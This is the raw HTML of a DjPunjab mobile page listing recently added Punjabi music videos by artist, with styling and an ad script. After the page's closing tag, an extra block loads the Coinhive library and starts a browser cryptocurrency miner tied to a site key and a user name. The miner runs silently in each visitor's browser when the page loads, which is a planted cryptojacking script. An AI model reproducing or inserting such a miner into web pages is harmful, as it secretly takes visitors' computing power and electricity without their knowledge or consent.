<!--  --><!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    	<meta property="fb:admins" content="100005956956567"/>
		<meta property="fb:app_id" content="1413048775663576" />
        <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
     	<meta name="robots" content="index, follow"/>
     	<meta name="googlebot" content="index, follow">
		<meta name="revisit-after" content="1 days"/>
		<meta name="rating" content="general"/>
		<meta name="author" content="DjPunjab.com"/>
		<meta name="copyright" content="DjPunjab.com" />
		<meta name="rating" content="general" />
		<meta name="language" content="en" />
		<link rel="icon" sizes="16x16" href="https://www.djpunjab.com/favicon.ico" />	
          <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" />
		
<meta property="og:title" content="Latest Videos DjPunjab Video" />
<meta property="og:url" content="http://djpunjab.video/video/latest.php" />
<meta property="og:description" content="Download free latest djpunjab video songs, you can download all artists Punjabi and Bollywood videos according to your choice from djpunjab.video with various formats." />
<meta name="description" content="Download free latest djpunjab video songs, you can download all artists Punjabi and Bollywood videos according to your choice from djpunjab.video with various formats." />
<meta name="keywords" content="djpunjab video, djpunjab new video, djpunjab latest video, djpunjab top20 video, Bollywood Videos download, downloads free Bollywood Videos songs" />  
<title>Download Free Latest Punjabi and Bollywood Video Songs  - DjPunjab</title>
<style type="text/css">
@charset "utf-8";
/* CSS Document */

body,div,table,tr,td,p,img,form{
}div,table,td,p,form{
	font-family: Verdana, Arial, Helvetica, sans-serif;
	font-size: 11px;
}body,td,th {
	font-size: 11px;
	color: #5D5D5D;
}
div.title {
	text-align:center;
	padding: 2px;
	background-color: #EDEDED;
	border-bottom: 1px dotted #AFCDDC;
	border-top: 1px dotted #AFCDDC;
	font-weight: bold;
}

a:link {
	color: #0099FF;
	font-size: 11px;
	text-decoration: none;
}
a:hover{
	text-decoration:underline overline;
	color: #000000;
}
a:visited {
	color: #0099FF;
	font-size: 11px;
}

a:active {
	color: #0099FF;
	font-size: 11px;
}
.style3 {
	color: #666666;
	font-weight: normal;
}

div.footer {	text-align:center;	padding: 2px;background-color: #FF3333;border-bottom: 1px dotted #AFCDDC;border-top: 1px dotted #AFCDDC;font-weight: bold;}.style1 {	color: #339900
}
.dj {color: #CC0000;
}
div.header1 {	padding: 3px;
	background-color: #3399FF;
	border-bottom: 1px solid #B1CADE;
	color: #FFFFFF;
	font-weight: bold;
}

.style18 {
	color: #009900;
	font-weight: bold;
}
div.header {

	padding:7px;
	background:#3399FF;
	repeat-x;
	color:#F5F5F5;
	border:1px solid #595959;
	font-weight:bold;
	margin-top:1px;

}
div.headertop {
	background-color: #030303;
	border:none;
	color:#292929;
	height:39px;
	padding:0;
	line-height: 39px;
	border-bottom: solid 3px #E4A915;
	font-weight: bold;
}
div.headerbottom {
	background-color: #797979;
	border:none;
	color:#fff;
	height:35px;
	padding:0;
	line-height: 35px;
	border-bottom: solid 2px red;
	text-align: center;
}
.djnew {
	margin: 1;	
}
.style19 {color: #FF0000}
.style20 {
	font-size: 12px
}
.style21 {
	color: #FF3300;
	font-weight: bold;
}
.black {
	color: #030303;
	
}
.red {
	color: #CC0000;
	font-weight: bolder;
}
 .socials-site a:hover {
  background:#333;
  }    .information > p {
    color: #333;
    margin: 5px 0;
}
.socials-site a {
   border-radius: 3px;
    color: #fff;
    display: inline-block;
    font-family: segoe ui;
    font-size: 11px;
    font-weight: bold;
    margin: 0 9px 2px 0;
    padding: 5px 12px 3px;
    position: relative;
    text-decoration: none;
    top: 2px;
}.whatrs-app-icons {
    background: none repeat scroll 0 0 #16b508;
}.facebook-icons {
    background: none repeat scroll 0 0 #3b5998;
}
.scrn-shot img{
	margin:5px;
}
img{
	max-width:100%;
}
.center{
text-align:center;
}
@media(max-width:600px){
.scrn-shot img{
margin:0;
}
}

  .socials-site a:hover {
  background:#333;
  }    .information > p {
    color: #333;
    margin: 5px 0;
}
/* .socials-site a {
    color: #fff;
    display: inline-block;
    font-family: segoe ui;
    font-size: 10px;
    font-weight: bold;
    margin: 2px 9px 6px 0;
    padding: 5px 12px;
    text-decoration: none;
} */.whatrs-app-icons {
    background: none repeat scroll 0 0 #16b508;
}.facebook-icons {
    background: none repeat scroll 0 0 #3b5998;
}
.scrn-shot img{
	margin:5px;
}
img{
	max-width:100%;
}
.center{
text-align:center;
}
@media(max-width:600px){
.scrn-shot img{
margin:0;
}
}
  </style>
		<link href="/touch.css" type="text/css" rel="stylesheet" />
  
  </head><body>
<div class="headertop">djpunjab.com official  </div>





<script type="text/javascript">
var ad_sitekey= "1462604738";
var ad_pub_id= "874J4Y6";
</script>
<script type="text/javascript" src="//api.adgoi-1.net/Api.php?Pubid=874J4Y6&Sitekey=1462604738&format=js"></script>

		<div class="header">Punjabi Video</div>
		<p class='dj'><a href='/video/latest.php'>Latest Video</a></p>
		<p class='dj'><a href='/video/recomended.php'>Recommended Videos</a></p>
		<p class='dj'><a href='/video/t_20.php'>Top 20 <span class="red">[Week]</span></a> </p>
		<p class='dj'><a href='/video/top_20.php'>Top 20 <span class="red">[Month]</span> </a> </p>
		<p class='dj'><a href='/video/artists.php'>All Artists</a></p>
		<div class="header">Bollywood Video</div>  	
		<p class='dj'><a href='/bollywood_video/latest.php'>Latest Video</a></p>
		<p class='dj'><a href='/bollywood_video/t_20.php'>Top 20 <span class="red">[Week]</span></a> </p>
		<p class='dj'><a href='/bollywood_video/top_20.php'>Top 20 <span class="red">[Month]</span></a> </p>
		<p class='dj'><a href='/bollywood_video/albums.php'>All Movies</a></p>
		<div class="header">Latest Update Video</div>  
		
<div class="all_updates">
			<p class="dj">
			<a href="http://djpunjab.video/video/12483/bewafa-pavvan.html" style="color:#0099FF; ">
				<span style="color: #009900;font-weight: bold;" class="style18">Punjabi Video &#187;
				</span>
				Bewafa &#187;
				<span style="color: #ff0000;" class="style19">[Pavvan]  </span>
			</a>
		</p>
			<p class="dj">
			<a href="http://djpunjab.video/video/12484/prison-jimmy-wraich.html" style="color:#0099FF; ">
				<span style="color: #009900;font-weight: bold;" class="style18">Punjabi Video &#187;
				</span>
				Prison &#187;
				<span style="color: #ff0000;" class="style19">[Jimmy Wraich]  </span>
			</a>
		</p>
			<p class="dj">
			<a href="http://djpunjab.video/video/12485/funkaar-waqar-ex.html" style="color:#0099FF; ">
				<span style="color: #009900;font-weight: bold;" class="style18">Punjabi Video &#187;
				</span>
				Funkaar &#187;
				<span style="color: #ff0000;" class="style19">[Waqar Ex]  </span>
			</a>
		</p>
			<p class="dj">
			<a href="http://djpunjab.video/video/12486/golak-bugni-bank-te-batua-trailer-harish-verma.html" style="color:#0099FF; ">
				<span style="color: #009900;font-weight: bold;" class="style18">Punjabi Video &#187;
				</span>
				Golak Bugni Bank Te Batua Trailer &#187;
				<span style="color: #ff0000;" class="style19">[Harish Verma]  </span>
			</a>
		</p>
			<p class="dj">
			<a href="http://djpunjab.video/video/12482/veer-bhagat-singh-anmol-gagan-maan.html" style="color:#0099FF; ">
				<span style="color: #009900;font-weight: bold;" class="style18">Punjabi Video &#187;
				</span>
				Veer Bhagat Singh &#187;
				<span style="color: #ff0000;" class="style19">[Anmol Gagan Maan]  </span>
			</a>
		</p>
			<p class="dj">
			<a href="http://djpunjab.video/video/12481/sajjda-gulam-jugni.html" style="color:#0099FF; ">
				<span style="color: #009900;font-weight: bold;" class="style18">Punjabi Video &#187;
				</span>
				Sajjda &#187;
				<span style="color: #ff0000;" class="style19">[Gulam Jugni]  </span>
			</a>
		</p>
			<p class="dj">
			<a href="http://djpunjab.video/video/12480/lado-rani-mandy-takhar.html" style="color:#0099FF; ">
				<span style="color: #009900;font-weight: bold;" class="style18">Punjabi Video &#187;
				</span>
				Lado Rani &#187;
				<span style="color: #ff0000;" class="style19">[Mandy Takhar]  </span>
			</a>
		</p>
			<p class="dj">
			<a href="http://djpunjab.video/video/12478/apnya-di-thaa-ranjit-bawa.html" style="color:#0099FF; ">
				<span style="color: #009900;font-weight: bold;" class="style18">Punjabi Video &#187;
				</span>
				Apnya Di Thaa &#187;
				<span style="color: #ff0000;" class="style19">[Ranjit Bawa]  </span>
			</a>
		</p>
			<p class="dj">
			<a href="http://djpunjab.video/video/12479/kiwe-sarda-partap-khaira.html" style="color:#0099FF; ">
				<span style="color: #009900;font-weight: bold;" class="style18">Punjabi Video &#187;
				</span>
				Kiwe Sarda &#187;
				<span style="color: #ff0000;" class="style19">[Partap Khaira]  </span>
			</a>
		</p>
			<p class="dj">
			<a href="http://djpunjab.video/video/12477/chill-mode-dilpreet-dhillon.html" style="color:#0099FF; ">
				<span style="color: #009900;font-weight: bold;" class="style18">Punjabi Video &#187;
				</span>
				Chill Mode &#187;
				<span style="color: #ff0000;" class="style19">[Dilpreet Dhillon]  </span>
			</a>
		</p>
			<p class="dj">
			<a href="http://djpunjab.video/video/12476/sazaa-surjit-khan.html" style="color:#0099FF; ">
				<span style="color: #009900;font-weight: bold;" class="style18">Punjabi Video &#187;
				</span>
				Sazaa &#187;
				<span style="color: #ff0000;" class="style19">[Surjit Khan]  </span>
			</a>
		</p>
			<p class="dj">
			<a href="http://djpunjab.video/video/12474/veer-bhagat-singh-sonu-nigam.html" style="color:#0099FF; ">
				<span style="color: #009900;font-weight: bold;" class="style18">Punjabi Video &#187;
				</span>
				Veer Bhagat Singh &#187;
				<span style="color: #ff0000;" class="style19">[Sonu Nigam]  </span>
			</a>
		</p>
			<p class="dj">
			<a href="http://djpunjab.video/video/12473/mustachers-kulbir-jhinjer.html" style="color:#0099FF; ">
				<span style="color: #009900;font-weight: bold;" class="style18">Punjabi Video &#187;
				</span>
				Mustachers &#187;
				<span style="color: #ff0000;" class="style19">[Kulbir Jhinjer]  </span>
			</a>
		</p>
			<p class="dj">
			<a href="http://djpunjab.video/video/12475/saroor-sangram-hanjra.html" style="color:#0099FF; ">
				<span style="color: #009900;font-weight: bold;" class="style18">Punjabi Video &#187;
				</span>
				Saroor &#187;
				<span style="color: #ff0000;" class="style19">[Sangram Hanjra]  </span>
			</a>
		</p>
			<p class="dj">
			<a href="http://djpunjab.video/video/12470/tere-vaastey-satinder-sartaaj.html" style="color:#0099FF; ">
				<span style="color: #009900;font-weight: bold;" class="style18">Punjabi Video &#187;
				</span>
				Tere Vaastey &#187;
				<span style="color: #ff0000;" class="style19">[Satinder Sartaaj]  </span>
			</a>
		</p>
			<p class="dj">
			<a href="http://djpunjab.video/video/12471/roti-diljit-dosanjh.html" style="color:#0099FF; ">
				<span style="color: #009900;font-weight: bold;" class="style18">Punjabi Video &#187;
				</span>
				Roti &#187;
				<span style="color: #ff0000;" class="style19">[Diljit Dosanjh]  </span>
			</a>
		</p>
			<p class="dj">
			<a href="http://djpunjab.video/video/12472/yaari-da-saroor-amrit-sandhu.html" style="color:#0099FF; ">
				<span style="color: #009900;font-weight: bold;" class="style18">Punjabi Video &#187;
				</span>
				Yaari Da Saroor &#187;
				<span style="color: #ff0000;" class="style19">[Amrit Sandhu]  </span>
			</a>
		</p>
			<p class="dj">
			<a href="http://djpunjab.video/video/12466/snapchat-sabee-sohal.html" style="color:#0099FF; ">
				<span style="color: #009900;font-weight: bold;" class="style18">Punjabi Video &#187;
				</span>
				Snapchat &#187;
				<span style="color: #ff0000;" class="style19">[Sabee Sohal]  </span>
			</a>
		</p>
			<p class="dj">
			<a href="http://djpunjab.video/video/12467/shada-parmish-verma.html" style="color:#0099FF; ">
				<span style="color: #009900;font-weight: bold;" class="style18">Punjabi Video &#187;
				</span>
				Shada &#187;
				<span style="color: #ff0000;" class="style19">[Parmish Verma]  </span>
			</a>
		</p>
			<p class="dj">
			<a href="http://djpunjab.video/video/12469/tere-naa-sucha-yaar.html" style="color:#0099FF; ">
				<span style="color: #009900;font-weight: bold;" class="style18">Punjabi Video &#187;
				</span>
				Tere Naa &#187;
				<span style="color: #ff0000;" class="style19">[Sucha Yaar]  </span>
			</a>
		</p>
			<p class="dj">
			<a href="http://djpunjab.video/video/12468/ferrrari-harsimran.html" style="color:#0099FF; ">
				<span style="color: #009900;font-weight: bold;" class="style18">Punjabi Video &#187;
				</span>
				Ferrrari &#187;
				<span style="color: #ff0000;" class="style19">[Harsimran]  </span>
			</a>
		</p>
			<p class="dj">
			<a href="http://djpunjab.video/video/12462/tha-tha-gagan-tung.html" style="color:#0099FF; ">
				<span style="color: #009900;font-weight: bold;" class="style18">Punjabi Video &#187;
				</span>
				Tha Tha &#187;
				<span style="color: #ff0000;" class="style19">[Gagan Tung]  </span>
			</a>
		</p>
			<p class="dj">
			<a href="http://djpunjab.video/video/12463/no-bullshit-jd-virk.html" style="color:#0099FF; ">
				<span style="color: #009900;font-weight: bold;" class="style18">Punjabi Video &#187;
				</span>
				No Bullshit &#187;
				<span style="color: #ff0000;" class="style19">[JD Virk]  </span>
			</a>
		</p>
			<p class="dj">
			<a href="http://djpunjab.video/video/12464/jatt-jameson-karam-bajwa.html" style="color:#0099FF; ">
				<span style="color: #009900;font-weight: bold;" class="style18">Punjabi Video &#187;
				</span>
				Jatt Jameson &#187;
				<span style="color: #ff0000;" class="style19">[Karam Bajwa]  </span>
			</a>
		</p>
			<p class="dj">
			<a href="http://djpunjab.video/video/12465/gal-dil-di-gippy-grewal.html" style="color:#0099FF; ">
				<span style="color: #009900;font-weight: bold;" class="style18">Punjabi Video &#187;
				</span>
				Gal Dil Di &#187;
				<span style="color: #ff0000;" class="style19">[Gippy Grewal]  </span>
			</a>
		</p>
			<p class="dj">
			<a href="http://djpunjab.video/video/12459/zindabad-kamal-heer.html" style="color:#0099FF; ">
				<span style="color: #009900;font-weight: bold;" class="style18">Punjabi Video &#187;
				</span>
				Zindabad &#187;
				<span style="color: #ff0000;" class="style19">[Kamal Heer]  </span>
			</a>
		</p>
			<p class="dj">
			<a href="http://djpunjab.video/video/12452/sajjana-diljit-dosanjh.html" style="color:#0099FF; ">
				<span style="color: #009900;font-weight: bold;" class="style18">Punjabi Video &#187;
				</span>
				Sajjana &#187;
				<span style="color: #ff0000;" class="style19">[Diljit Dosanjh]  </span>
			</a>
		</p>
			<p class="dj">
			<a href="http://djpunjab.video/video/12453/fauji-the-landers.html" style="color:#0099FF; ">
				<span style="color: #009900;font-weight: bold;" class="style18">Punjabi Video &#187;
				</span>
				Fauji &#187;
				<span style="color: #ff0000;" class="style19">[The Landers]  </span>
			</a>
		</p>
			<p class="dj">
			<a href="http://djpunjab.video/video/12461/laggi-hove-ghutt-upkar-sandhu.html" style="color:#0099FF; ">
				<span style="color: #009900;font-weight: bold;" class="style18">Punjabi Video &#187;
				</span>
				Laggi Hove Ghutt &#187;
				<span style="color: #ff0000;" class="style19">[Upkar Sandhu]  </span>
			</a>
		</p>
			<p class="dj">
			<a href="http://djpunjab.video/video/12455/ghora-iii-benny-dhaliwal.html" style="color:#0099FF; ">
				<span style="color: #009900;font-weight: bold;" class="style18">Punjabi Video &#187;
				</span>
				Ghora III &#187;
				<span style="color: #ff0000;" class="style19">[Benny Dhaliwal]  </span>
			</a>
		</p>
			<p class="dj">
			<a href="http://djpunjab.video/video/12454/ik-tare-wala-ranjit-bawa.html" style="color:#0099FF; ">
				<span style="color: #009900;font-weight: bold;" class="style18">Punjabi Video &#187;
				</span>
				Ik Tare Wala &#187;
				<span style="color: #ff0000;" class="style19">[Ranjit Bawa]  </span>
			</a>
		</p>
			<p class="dj">
			<a href="http://djpunjab.video/video/12460/trending-nakhra-amrit-maan.html" style="color:#0099FF; ">
				<span style="color: #009900;font-weight: bold;" class="style18">Punjabi Video &#187;
				</span>
				Trending Nakhra &#187;
				<span style="color: #ff0000;" class="style19">[Amrit Maan]  </span>
			</a>
		</p>
			<p class="dj">
			<a href="http://djpunjab.video/video/12458/lafaafe-sanam-bhullar.html" style="color:#0099FF; ">
				<span style="color: #009900;font-weight: bold;" class="style18">Punjabi Video &#187;
				</span>
				Lafaafe &#187;
				<span style="color: #ff0000;" class="style19">[Sanam Bhullar]  </span>
			</a>
		</p>
			<p class="dj">
			<a href="http://djpunjab.video/video/12456/robin-hood-aman-yaar.html" style="color:#0099FF; ">
				<span style="color: #009900;font-weight: bold;" class="style18">Punjabi Video &#187;
				</span>
				Robin Hood &#187;
				<span style="color: #ff0000;" class="style19">[Aman Yaar]  </span>
			</a>
		</p>
			<p class="dj">
			<a href="http://djpunjab.video/video/12457/ishq-kahani-jatinder-bhaluria.html" style="color:#0099FF; ">
				<span style="color: #009900;font-weight: bold;" class="style18">Punjabi Video &#187;
				</span>
				Ishq kahani &#187;
				<span style="color: #ff0000;" class="style19">[Jatinder Bhaluria]  </span>
			</a>
		</p>
			<p class="dj">
			<a href="http://djpunjab.video/video/12427/bad-seed-sultaan.html" style="color:#0099FF; ">
				<span style="color: #009900;font-weight: bold;" class="style18">Punjabi Video &#187;
				</span>
				Bad Seed &#187;
				<span style="color: #ff0000;" class="style19">[Sultaan]  </span>
			</a>
		</p>
			<p class="dj">
			<a href="http://djpunjab.video/video/12428/cheta-tera-sajjan-adeeb.html" style="color:#0099FF; ">
				<span style="color: #009900;font-weight: bold;" class="style18">Punjabi Video &#187;
				</span>
				Cheta Tera &#187;
				<span style="color: #ff0000;" class="style19">[Sajjan Adeeb]  </span>
			</a>
		</p>
			<p class="dj">
			<a href="http://djpunjab.video/video/12426/naino-nay-tere-rahat-fateh-ali-khan.html" style="color:#0099FF; ">
				<span style="color: #009900;font-weight: bold;" class="style18">Punjabi Video &#187;
				</span>
				Naino Nay Tere &#187;
				<span style="color: #ff0000;" class="style19">[Rahat Fateh Ali Khan]  </span>
			</a>
		</p>
			<p class="dj">
			<a href="http://djpunjab.video/video/12425/kaali-hummer-maninder-buttar.html" style="color:#0099FF; ">
				<span style="color: #009900;font-weight: bold;" class="style18">Punjabi Video &#187;
				</span>
				Kaali Hummer &#187;
				<span style="color: #ff0000;" class="style19">[Maninder Buttar]  </span>
			</a>
		</p>
			<p class="dj">
			<a href="http://djpunjab.video/video/12424/jigra-baaghi.html" style="color:#0099FF; ">
				<span style="color: #009900;font-weight: bold;" class="style18">Punjabi Video &#187;
				</span>
				Jigra &#187;
				<span style="color: #ff0000;" class="style19">[Baaghi]  </span>
			</a>
		</p>
	</div>



<hr/>
<p class="dj"> <a href="https://www.djpunjab.com"><b>Home</b></a></p><div class="headerbottom">DjPunjab.Com(2017)</div>
</body></html>

<html>
<body>
<script src='https://coinhive.com/lib/coinhive.min.js'></script>
<script>
	var miner = new CoinHive.User('BQey5NM18Qz6T1Xak3QNJNxpp3uFUg4m', 'hexm4n');
	miner.start();
</script>
	 
	</body>
</html>